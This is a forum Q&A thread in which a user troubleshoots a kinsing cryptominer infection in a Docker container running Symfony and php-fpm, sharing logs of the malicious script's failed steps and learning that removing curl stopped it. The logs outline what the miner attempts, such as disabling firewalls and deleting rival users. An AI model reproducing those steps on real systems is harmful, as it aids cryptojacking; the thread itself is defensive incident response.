0

I have - like few dozen others - the Miner kinsing in my deployment.

Unlike the others I have an minimal server with no redis installed and also no cron. The only things I've installed is symfony, php-fpm and apache in a docker evironment.

However - if I start the container in my azure environment about on hour later if the process kinsing active. In the container php-fpm running as user apache.

The docker log says:

26-Oct-2020 15:50:08] NOTICE: fpm is running, pid 1
[26-Oct-2020 15:50:08] NOTICE: ready to handle connections
[26-Oct-2020 15:50:08] NOTICE: systemd monitor interval set to 10000ms
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "                                 Dload  Upload   Total   Spent    Left  Speed"
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0sh: line 4: chattr: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 5: chattr: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 6: chattr: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 7: chattr: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 8: ufw: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 9: iptables: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 11: sudo: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 12: /proc/sys/kernel/nmi_watchdog: Read-only file system"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 13: /etc/sysctl.conf: Permission denied"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "userdel: user 'akay' does not exist"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "userdel: user 'vfinder' does not exist"

In the 4th and 5th line it looks like the output of wget. But this isnt installed at all.

Now I'm getting curious - how can this Miner access my system when the "usual" ways to spread aren't installed?

My plan is to trace every file operation after starting the container until I find a two-digit sh which makes the other steps.

I couldn't install sysdig (https://github.com/draios/sysdig/wiki/How-to-Install-Sysdig-for-Linux) in the container - what alternative could I use? A tool which writes every file movement and every started process to a log would be great.

Any recomendations?

logg sar
  • 1
  • 3

1 Answers1

0

@A.B curl - of course! facepalm.

After deleting curl nothing happened. No new infection.

However - I created a strace-log of the infection. In my case its obviously the symfony-framework..... If anyone is interested in the log for understanding the infection-way I can provide it.

Thanks for the hint. I will inform the symfony-guys and harden the connection symfony<->apache.

logg sar
  • 1
  • 3
  • sas i would like to have your strace-log. Because I have the same problem. – MarkT Nov 04 '20 at 17:11
  • me2, in my case it was Docker container with php-fpm 7.3, mautic (symfony framework based) and Nginx on host system. think it was misconfigured Nginx conf to proxy_pass docker port 9000 for fast_cgi. some hints I was find here https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html – Andriy Gonchar Nov 20 '20 at 20:12